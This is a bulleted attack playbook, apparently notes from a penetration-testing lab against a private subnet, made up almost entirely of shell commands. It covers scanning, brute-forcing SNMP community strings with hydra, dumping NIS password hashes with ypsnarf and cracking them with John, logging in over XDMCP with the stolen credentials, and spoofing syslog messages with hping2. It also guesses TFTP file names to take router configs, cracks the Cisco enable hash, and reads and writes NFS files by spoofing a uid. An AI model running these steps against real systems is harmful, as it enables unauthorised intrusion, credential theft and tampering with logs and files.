• Add a route through my laptop to the targets:

route add -net 192.168.243.0 netmask 255.255.255.0 gw (my_ip) eth0

• nmap to scan for systems and udp services (don't do too many ports)

nmap -sU -sV -v -v -p 7,13,53,111,161,389,2049 192.168.243.0/24

• Use Netcat to connect to the simple services

nc -un hostname port

• Use DNS reverse lookups to get hostnames

host ip_to_lookup server_ip

• Use guess.sh or hydra to guess snmp community string

./hydra ip_address snmp -P file.txt

• Use snmp to get more port information

snmpwalk -c community_string hostname > tmpfile

./guess.sh "snmpwalk -c " filename " ip_address"

• Connect to the NIS server and get password hashes

./ypsnarf ip_address domain_name passwd.byname > filename

• Guess NIS passwords with John

./john filename

• Connect to the xdmcp server and login with a NIS username and password

Xnest -query ip_address:1

• Create Syslog Message

echo “<8>itunderground rulez!” > syslogfile.txt

• Send spoofed messages to the Syslog Daemons

hping2 ip_address -2 -s 514 -p 514 -d 25 -E syslogfile.txt -c 1 -a 1.2.3.4

• Get router configuration files from the tftp server (create file of possible names)

./guess.sh "tftp ip_address -c get " filename ""

• Guess Router Enable Password with John

echo “test:$1$....” > cisco.txt (where $1$... is the enable string from the router configuration file)

./john cisco.txt

• Read and write files on the NFS servers

nfs

nfs> host ip_address (connects)

nfs> dump (gets list of shared directories)

nfs> mount -U /dir/name

nfs> ls

nfs> get filename

nfs> ls -l

drwxr-xr-x 2 500 0 4096 Dec 20 21:58 .

drwxr-xr-x 2 500 0 4096 Dec 20 21:58 ..

-rw-r--r-- 1 0 0 5 Dec 20 21:51 asdf.txt

nfs> uid 500

nfs> put filename

• Connect to the Windows RPC port using nbtstat to see endpoints

nbtstat ip_address